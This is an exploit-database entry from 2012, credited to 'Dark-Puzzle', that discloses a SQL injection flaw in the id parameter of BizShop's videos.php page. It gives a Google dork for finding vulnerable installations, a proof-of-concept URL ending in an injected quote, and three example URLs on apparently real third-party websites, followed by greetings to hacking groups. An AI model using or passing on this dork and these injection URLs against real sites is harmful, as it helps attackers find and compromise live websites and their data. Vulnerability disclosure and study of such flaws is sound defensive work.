id: 18803
date: 06/24/2012
title: BizShop - SQL Injection Vulnerability
author: Dark-Puzzle
cves: 

# Exploit Title: BizShop - SQL Injection Vulnerability
# Author: Dark-Puzzle
# Category : Webapps
# Vendor Homepage: http://bizshop.com/
# Google Dork: inurl:videos.php?id intext:"Powered by BizShop Webmaster Service"
# Date: 24 June 2012
# Vendor : BizShop Webmaster Service .
# Version: All Versions 
# Tested on: Windows Xp Sp2 , Backtrack 5 .

-----------------------------------------------------------
Vulnerability :

http://example.com/videos.php?id=darkpuzzle'

Examples :

http://healthbizshop.com/videos.php?id=Cheerleading'
http://server1.bizshop.com/videos.php?id=Instrumental Solo'
http://www.healthandmoney4u.com/videos.php?id=Church+Choir'


-----------------------------------------------------------

Follow me : https://www.facebook.com/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Dr.napst3r , Jigs@w ...



#  0day.today [2023-03-24]  #